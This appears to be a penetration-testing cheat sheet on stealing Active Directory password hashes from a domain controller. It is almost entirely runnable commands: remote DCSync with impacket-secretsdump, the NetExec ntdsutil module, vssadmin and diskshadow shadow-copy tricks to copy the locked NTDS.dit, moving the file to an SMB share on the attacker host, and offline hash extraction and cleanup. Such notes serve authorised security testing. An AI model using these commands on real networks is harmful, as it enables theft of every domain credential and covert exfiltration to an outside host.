Summary

Attack

impacket-secretsdump

Remote dump over DRSUAPI (no file copy; needs Domain Admin or replication rights such as DS-Replication-Get-Changes / -All). -just-dc limits the dump to NTDS secrets, and -outputfile writes them to dc_dump.ntds:

impacket-secretsdump [Domain]/[User]:[Password]@[DC_IP] -just-dc -outputfile dc_dump

NetExec

The ntdsutil module runs ntdsutil on the DC to snapshot NTDS.dit and the SYSTEM hive, pulls both back and parses them locally; it needs local admin on the DC:

nxc smb $IP -u [username] -p [password] -M ntdsutil

vssadmin

<aside>

Create a shadow copy of C: (local admin on the DC; NTDS.dit is locked by LSASS on the live volume, so it is read from the snapshot instead)

vssadmin CREATE SHADOW /For=C:

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copy NTDS.dit from the VSS, using the Shadow Copy Volume Name printed above (the HarddiskVolumeShadowCopy number differs per snapshot)

C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit

Create a share with smbserver on the attacker host

impacket-smbserver share . -smb2support -user test -password test

Transfer NTDS.dit to the attacker host (the share was started with credentials, so map it first with net use as test:test; the SYSTEM hive exported with reg save goes over the same way, since the hashes in NTDS.dit are encrypted with a key derived from its boot key)

C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\$IP\share

Extract hashes from NTDS.dit offline; SYSTEM is the saved hive file, LOCAL tells secretsdump to parse the files instead of connecting to a host

impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL

Afterwards remove the snapshot with vssadmin delete shadows (the shadow copy ID above) so it is not left behind on the DC.

</aside>

diskshadow script to save NTDS.dit (alternative to vssadmin: diskshadow is a signed Microsoft binary present on servers, and it can expose the snapshot directly as a drive letter)

# save this in script.txt
# the trailing X on every line is intentional: diskshadow drops the last
# character of each line it reads with /s, so the X is consumed instead of the command
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

# run diskshadow (as local admin); the snapshot of C: is now mounted at E:
diskshadow /s script.txt

# copy ntds.dit from the exposed snapshot into the current directory
# /b = backup mode, so the read uses SeBackupPrivilege and ignores the file ACL
robocopy /b E:\Windows\ntds . ntds.dit